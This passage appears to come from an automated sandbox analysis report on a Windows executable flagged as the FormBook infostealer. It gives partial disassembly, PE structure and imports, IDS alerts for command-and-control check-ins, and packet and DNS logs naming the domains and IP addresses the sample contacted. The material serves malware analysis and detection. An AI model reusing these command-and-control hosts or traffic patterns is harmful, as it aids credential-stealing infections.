                                                                                                                        call dword ptr [004070B0h]
                                                                                                                        push ebx
                                                                                                                        call dword ptr [0040727Ch]
                                                                                                                        push 00000008h
                                                                                                                        mov dword ptr [00423F38h], eax
                                                                                                                        call 00007F1A68A19336h
                                                                                                                        mov dword ptr [00423E84h], eax
                                                                                                                        push ebx
                                                                                                                        lea eax, dword ptr [esp+34h]
                                                                                                                        push 00000160h
                                                                                                                        push eax
                                                                                                                        push ebx
                                                                                                                        push 0041F430h
                                                                                                                        call dword ptr [00407158h]
                                                                                                                        push 00409154h
                                                                                                                        push 00423680h
                                                                                                                        call 00007F1A68A18FE9h
                                                                                                                        call dword ptr [004070ACh]
                                                                                                                        mov edi, 00429000h
                                                                                                                        push eax
                                                                                                                        push edi
                                                                                                                        call 00007F1A68A18FD7h
                                                                                                                        push ebx
                                                                                                                        call dword ptr [0040710Ch]
                                                                                                                        cmp byte ptr [00429000h], 00000022h
                                                                                                                        mov dword ptr [00423E80h], eax
                                                                                                                        mov eax, edi
                                                                                                                        jne 00007F1A68A1674Ch
                                                                                                                        mov byte ptr [esp+14h], 00000022h
                                                                                                                        mov eax, 00429001h
                                                                                                                        push dword ptr [esp+14h]
                                                                                                                        push eax
                                                                                                                        call 00007F1A68A18ACAh
                                                                                                                        push eax
                                                                                                                        call dword ptr [0040721Ch]
                                                                                                                        mov dword ptr [esp+1Ch], eax
                                                                                                                        jmp 00007F1A68A167A5h
                                                                                                                        cmp cl, 00000020h
                                                                                                                        jne 00007F1A68A16748h
                                                                                                                        inc eax
                                                                                                                        cmp byte ptr [eax], 00000020h
                                                                                                                        je 00007F1A68A1673Ch
                                                                                                                        cmp byte ptr [eax], 00000022h
                                                                                                                        mov byte ptr [eax+eax+00h], 00000000h

                                                                                                                        Rich Headers

                                                                                                                        Programming Language:
                                                                                                                        • [EXP] VC++ 6.0 SP5 build 8804

                                                                                                                        Data Directories

                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x73a40xb4.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2c0000xc68.rsrc
                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                        Sections

                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                        .text0x10000x58d20x5a00False0.665234375data6.43310034828IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                                                                        .rdata0x70000x11900x1200False0.4453125data5.17976375781IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .data0x90000x1af780x400False0.55078125data4.6178023207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                                                                                                        .ndata0x240000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                        .rsrc0x2c0000xc680xe00False0.407087053571data3.98321239368IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                                                                                        Resources

                                                                                                                        NameRVASizeTypeLanguageCountry
                                                                                                                        RT_ICON0x2c1d80x2e8dataEnglishUnited States
                                                                                                                        RT_DIALOG0x2c4c00x100dataEnglishUnited States
                                                                                                                        RT_DIALOG0x2c5c00x11cdataEnglishUnited States
                                                                                                                        RT_DIALOG0x2c6e00x60dataEnglishUnited States
                                                                                                                        RT_GROUP_ICON0x2c7400x14dataEnglishUnited States
                                                                                                                        RT_VERSION0x2c7580x23cdata
                                                                                                                        RT_MANIFEST0x2c9980x2ccXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                                                                        Imports

                                                                                                                        DLLImport
                                                                                                                        KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                                                                                                        USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                                                        GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                                                        SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                                                        ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                                                        COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                                                        ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                                                        VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                                                                                                        Version Infos

                                                                                                                        DescriptionData
                                                                                                                        LegalCopyrightrules
                                                                                                                        FileVersion6.3.0.6
                                                                                                                        CompanyNamecloak
                                                                                                                        LegalTrademarkserect
                                                                                                                        Commentsconspired
                                                                                                                        ProductNameunsubstantiated
                                                                                                                        FileDescriptionteam
                                                                                                                        Translation0x0000 0x04e4

                                                                                                                        Possible Origin

                                                                                                                        Language of compilation systemCountry where language is spokenMap
                                                                                                                        EnglishUnited States

                                                                                                                        Network Behavior

                                                                                                                        Snort IDS Alerts

                                                                                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                        06/16/21-11:56:24.869313TCP1201ATTACK-RESPONSES 403 Forbidden804972434.102.136.180192.168.2.5
                                                                                                                        06/16/21-11:56:35.233381TCP1201ATTACK-RESPONSES 403 Forbidden804972534.102.136.180192.168.2.5
                                                                                                                        06/16/21-11:56:46.451286TCP1201ATTACK-RESPONSES 403 Forbidden8049727100.24.208.97192.168.2.5
                                                                                                                        06/16/21-11:57:29.460119TCP1201ATTACK-RESPONSES 403 Forbidden804973934.102.136.180192.168.2.5
                                                                                                                        06/16/21-11:57:34.736114TCP2031453ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.5104.252.53.222
                                                                                                                        06/16/21-11:57:34.736114TCP2031449ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.5104.252.53.222
                                                                                                                        06/16/21-11:57:34.736114TCP2031412ET TROJAN FormBook CnC Checkin (GET)4974080192.168.2.5104.252.53.222

                                                                                                                        Network Port Distribution

                                                                                                                        TCP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 16, 2021 11:56:24.688205957 CEST4972480192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:24.730207920 CEST804972434.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:24.730315924 CEST4972480192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:24.730427027 CEST4972480192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:24.772450924 CEST804972434.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:24.869313002 CEST804972434.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:24.869354010 CEST804972434.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:24.869544983 CEST4972480192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:24.869610071 CEST4972480192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:24.912322044 CEST804972434.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:35.051707983 CEST4972580192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:35.094455004 CEST804972534.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:35.094558954 CEST4972580192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:35.094669104 CEST4972580192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:35.137404919 CEST804972534.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:35.233381033 CEST804972534.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:35.233429909 CEST804972534.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:35.233649969 CEST4972580192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:35.233704090 CEST4972580192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:35.541867971 CEST4972580192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:56:35.585726023 CEST804972534.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:40.335808039 CEST4972680192.168.2.5154.216.127.214
                                                                                                                        Jun 16, 2021 11:56:40.636512041 CEST8049726154.216.127.214192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:40.636651039 CEST4972680192.168.2.5154.216.127.214
                                                                                                                        Jun 16, 2021 11:56:40.636791945 CEST4972680192.168.2.5154.216.127.214
                                                                                                                        Jun 16, 2021 11:56:40.936868906 CEST8049726154.216.127.214192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:40.945055962 CEST8049726154.216.127.214192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:40.945220947 CEST4972680192.168.2.5154.216.127.214
                                                                                                                        Jun 16, 2021 11:56:40.945296049 CEST4972680192.168.2.5154.216.127.214
                                                                                                                        Jun 16, 2021 11:56:41.247371912 CEST8049726154.216.127.214192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:46.121514082 CEST4972780192.168.2.5100.24.208.97
                                                                                                                        Jun 16, 2021 11:56:46.286592007 CEST8049727100.24.208.97192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:46.287946939 CEST4972780192.168.2.5100.24.208.97
                                                                                                                        Jun 16, 2021 11:56:46.288027048 CEST4972780192.168.2.5100.24.208.97
                                                                                                                        Jun 16, 2021 11:56:46.451244116 CEST8049727100.24.208.97192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:46.451286077 CEST8049727100.24.208.97192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:46.451313972 CEST8049727100.24.208.97192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:46.451463938 CEST4972780192.168.2.5100.24.208.97
                                                                                                                        Jun 16, 2021 11:56:46.451544046 CEST4972780192.168.2.5100.24.208.97
                                                                                                                        Jun 16, 2021 11:56:46.614643097 CEST8049727100.24.208.97192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:51.653141975 CEST4972880192.168.2.544.227.65.245
                                                                                                                        Jun 16, 2021 11:56:51.859803915 CEST804972844.227.65.245192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:51.864295959 CEST4972880192.168.2.544.227.65.245
                                                                                                                        Jun 16, 2021 11:56:52.070557117 CEST804972844.227.65.245192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:52.072431087 CEST4972880192.168.2.544.227.65.245
                                                                                                                        Jun 16, 2021 11:56:52.278664112 CEST804972844.227.65.245192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:52.284991026 CEST804972844.227.65.245192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:52.285027027 CEST804972844.227.65.245192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:52.285314083 CEST4972880192.168.2.544.227.65.245
                                                                                                                        Jun 16, 2021 11:56:52.285372972 CEST4972880192.168.2.544.227.65.245
                                                                                                                        Jun 16, 2021 11:56:52.491643906 CEST804972844.227.65.245192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:57.679660082 CEST4973080192.168.2.5103.28.148.178
                                                                                                                        Jun 16, 2021 11:56:57.887600899 CEST8049730103.28.148.178192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:57.887728930 CEST4973080192.168.2.5103.28.148.178
                                                                                                                        Jun 16, 2021 11:56:57.887948036 CEST4973080192.168.2.5103.28.148.178
                                                                                                                        Jun 16, 2021 11:56:58.096360922 CEST8049730103.28.148.178192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:58.096405029 CEST8049730103.28.148.178192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:58.096425056 CEST8049730103.28.148.178192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:58.096636057 CEST4973080192.168.2.5103.28.148.178
                                                                                                                        Jun 16, 2021 11:56:58.096677065 CEST4973080192.168.2.5103.28.148.178
                                                                                                                        Jun 16, 2021 11:57:08.600071907 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.644131899 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.644248009 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.644377947 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.688664913 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744154930 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744203091 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744240999 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744281054 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744318008 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744355917 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744385004 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744393110 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.744421959 CEST8049737172.67.193.107192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.744436979 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.744445086 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.744450092 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.744453907 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.744458914 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:08.744478941 CEST4973780192.168.2.5172.67.193.107
                                                                                                                        Jun 16, 2021 11:57:18.859307051 CEST4973880192.168.2.5192.0.78.24
                                                                                                                        Jun 16, 2021 11:57:18.902406931 CEST8049738192.0.78.24192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:18.902602911 CEST4973880192.168.2.5192.0.78.24
                                                                                                                        Jun 16, 2021 11:57:18.902817965 CEST4973880192.168.2.5192.0.78.24
                                                                                                                        Jun 16, 2021 11:57:18.944798946 CEST8049738192.0.78.24192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:18.944828033 CEST8049738192.0.78.24192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:18.944839954 CEST8049738192.0.78.24192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:18.945058107 CEST4973880192.168.2.5192.0.78.24
                                                                                                                        Jun 16, 2021 11:57:18.945122957 CEST4973880192.168.2.5192.0.78.24
                                                                                                                        Jun 16, 2021 11:57:18.987149000 CEST8049738192.0.78.24192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:29.277925014 CEST4973980192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:57:29.320127964 CEST804973934.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:29.320230961 CEST4973980192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:57:29.320394993 CEST4973980192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:57:29.362550020 CEST804973934.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:29.460119009 CEST804973934.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:29.460160017 CEST804973934.102.136.180192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:29.460418940 CEST4973980192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:57:29.460449934 CEST4973980192.168.2.534.102.136.180
                                                                                                                        Jun 16, 2021 11:57:29.503093004 CEST804973934.102.136.180192.168.2.5

                                                                                                                        UDP Packets

                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                        Jun 16, 2021 11:55:07.948940992 CEST6173353192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:08.017323017 CEST53617338.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:08.687066078 CEST6544753192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:08.738143921 CEST53654478.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:09.180037975 CEST5244153192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:09.239356995 CEST53524418.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:09.533924103 CEST6217653192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:09.583992958 CEST53621768.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:10.445507050 CEST5959653192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:10.501691103 CEST53595968.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:24.238585949 CEST6529653192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:24.298947096 CEST53652968.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:25.048288107 CEST6318353192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:25.107140064 CEST53631838.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:30.633595943 CEST6015153192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:30.684129000 CEST53601518.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:32.106020927 CEST5696953192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:32.174222946 CEST53569698.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:33.649411917 CEST5516153192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:33.700258970 CEST53551618.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:35.138420105 CEST5475753192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:35.201173067 CEST53547578.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:36.096399069 CEST4999253192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:36.155591011 CEST53499928.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:55:47.553071976 CEST6007553192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:55:47.617930889 CEST53600758.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:04.004170895 CEST5501653192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:04.063015938 CEST53550168.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:04.214936972 CEST6434553192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:04.273946047 CEST53643458.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:09.068285942 CEST5712853192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:09.150701046 CEST53571288.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:24.612291098 CEST5479153192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:24.680284023 CEST53547918.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:29.889878035 CEST5046353192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:29.964941978 CEST53504638.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:34.983804941 CEST5039453192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:35.048515081 CEST53503948.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:40.268513918 CEST5853053192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:40.334650040 CEST53585308.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:45.964019060 CEST5381353192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:46.120248079 CEST53538138.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:51.474980116 CEST6373253192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:51.648000956 CEST53637328.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:52.429426908 CEST5734453192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:52.493499041 CEST53573448.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:57.314948082 CEST5445053192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:57.677643061 CEST53544508.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:56:58.209364891 CEST5926153192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:56:58.274971008 CEST53592618.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:03.110196114 CEST5715153192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:03.516789913 CEST53571518.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:04.615060091 CEST5941353192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:04.676740885 CEST53594138.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:08.532646894 CEST6051653192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:08.598931074 CEST53605168.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:18.786890030 CEST5164953192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:18.857973099 CEST53516498.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:23.957458019 CEST6508653192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:24.191294909 CEST53650868.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:29.211631060 CEST5643253192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:29.276146889 CEST53564328.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:34.469780922 CEST5292953192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:34.539542913 CEST53529298.8.8.8192.168.2.5
                                                                                                                        Jun 16, 2021 11:57:40.251743078 CEST6431753192.168.2.58.8.8.8
                                                                                                                        Jun 16, 2021 11:57:40.319406033 CEST53643178.8.8.8192.168.2.5

                                                                                                                        DNS Queries

                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                        Jun 16, 2021 11:56:24.612291098 CEST192.168.2.58.8.8.80xbcdStandard query (0)www.jiltedowl.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:29.889878035 CEST192.168.2.58.8.8.80x2a65Standard query (0)www.top1opp.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:34.983804941 CEST192.168.2.58.8.8.80xcf90Standard query (0)www.slingshotart.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:40.268513918 CEST192.168.2.58.8.8.80x2a42Standard query (0)www.venturivasiljevic.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:45.964019060 CEST192.168.2.58.8.8.80xaba1Standard query (0)www.helpushelpothersstore.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:51.474980116 CEST192.168.2.58.8.8.80x11e1Standard query (0)www.vicdux.lifeA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:57.314948082 CEST192.168.2.58.8.8.80xc140Standard query (0)www.lippocaritahotel.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:03.110196114 CEST192.168.2.58.8.8.80xb8cStandard query (0)www.saddletaxweigh.infoA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:08.532646894 CEST192.168.2.58.8.8.80xbad9Standard query (0)www.sitedesing.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:18.786890030 CEST192.168.2.58.8.8.80xaae6Standard query (0)www.themiamadison.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:23.957458019 CEST192.168.2.58.8.8.80xb48cStandard query (0)www.yorkshirebridalmakeup.infoA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:29.211631060 CEST192.168.2.58.8.8.80x7ebaStandard query (0)www.influenced-brands.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:34.469780922 CEST192.168.2.58.8.8.80x78afStandard query (0)www.angrybird23blog.comA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:57:40.251743078 CEST192.168.2.58.8.8.80x6b2bStandard query (0)www.therios.netA (IP address)IN (0x0001)

                                                                                                                        DNS Answers

                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                        Jun 16, 2021 11:56:24.680284023 CEST8.8.8.8192.168.2.50xbcdNo error (0)www.jiltedowl.comjiltedowl.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:24.680284023 CEST8.8.8.8192.168.2.50xbcdNo error (0)jiltedowl.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:29.964941978 CEST8.8.8.8192.168.2.50x2a65Server failure (2)www.top1opp.comnonenoneA (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:35.048515081 CEST8.8.8.8192.168.2.50xcf90No error (0)www.slingshotart.comslingshotart.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:35.048515081 CEST8.8.8.8192.168.2.50xcf90No error (0)slingshotart.com34.102.136.180A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:40.334650040 CEST8.8.8.8192.168.2.50x2a42No error (0)www.venturivasiljevic.com154.216.127.214A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:46.120248079 CEST8.8.8.8192.168.2.50xaba1No error (0)www.helpushelpothersstore.coms.multiscreensite.comCNAME (Canonical name)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:46.120248079 CEST8.8.8.8192.168.2.50xaba1No error (0)s.multiscreensite.com100.24.208.97A (IP address)IN (0x0001)
                                                                                                                        Jun 16, 2021 11:56:46.120248079 CEST8.8.8.8192.168.2.50xaba1No error (0)s.multiscreensite.com35.172.94.1A (IP address)IN (0x0001)
